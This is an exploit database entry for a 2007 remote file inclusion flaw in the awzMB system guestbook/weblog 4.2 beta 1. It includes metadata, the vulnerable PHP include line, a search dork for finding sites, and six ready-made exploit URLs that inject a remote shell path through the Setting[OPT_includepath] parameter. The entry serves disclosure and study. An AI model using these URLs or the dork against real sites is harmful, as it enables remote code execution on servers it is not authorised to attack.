awzMB system Version 4.2 beta 1 Remote File Inclusion Vulnerability

vendor:

awzMB system

by:

S.W.A.T.

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: awzMB system

Affected Version From: awzMB system Version 4.2 beta 1

Affected Version To: awzMB system Version 4.2 beta 1

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Not specified

2007

awzMB system Version 4.2 beta 1 Remote File Inclusion Vulnerability

The vulnerability allows an attacker to include arbitrary files from a remote server, which can lead to remote code execution or information disclosure.

Mitigation:

Apply the latest security patches and ensure that input validation is performed properly.

Source

Exploit-DB raw data:

                      \\\|///
                    \\  - -  //      Xmors Underground Group
                     (  @ @ )
              ----oOOo--(_)-oOOo--------------------------------------------------
              Portal   :  awzMB system Version 4.2 beta 1 Guestbook/Weblog/Contact
              Download :  http://downloads.sourceforge.net/awzmb/awzmb_4.2_beta1.zip
	      Author   :  S.W.A.T.
	      HomePage :  wWw.XmorS.CoM
	      Type     :  Remote File Inclusion
              Y! ID    :  Svvateam
              E-Mail   :  Svvateam@yahoo.com / S.W.4.T@hackermail.com
              OurForum :  http://svvat.3host.biz/forum/index.php
              Dork     :  Copyright Ã‚Â© 2001-2007 awzMB Project
              ----ooooO-----Ooooo--------------------------------------------------
                  (   )     (   )
                   \ (       ) /
                    \_)     (_/


+---------------------------------------------------------------------------------------------+

Vuln Code :

if (!isset($Setting[OPT_includepath])) $Setting[OPT_includepath] = '';

include_once($Setting[OPT_includepath].'awzmb/modules/core/core.incl.php');

+---------------------------------------------------------------------------------------------+
+---------------------------------------------------------------------------------------------+

Exploit :

http://[TARGET]/[PATH]/awzmb/adminhelp.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/admin.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/reg.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/help.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/gbook.incl.php?Setting[OPT_includepath]=[-Sh3ll-]
http://[TARGET]/[PATH]/awzmb/modules/core/core.incl.php?Setting[OPT_includepath]=[-Sh3ll-]

+---------------------------------------------------------------------------------------------+

# milw0rm.com [2007-10-18]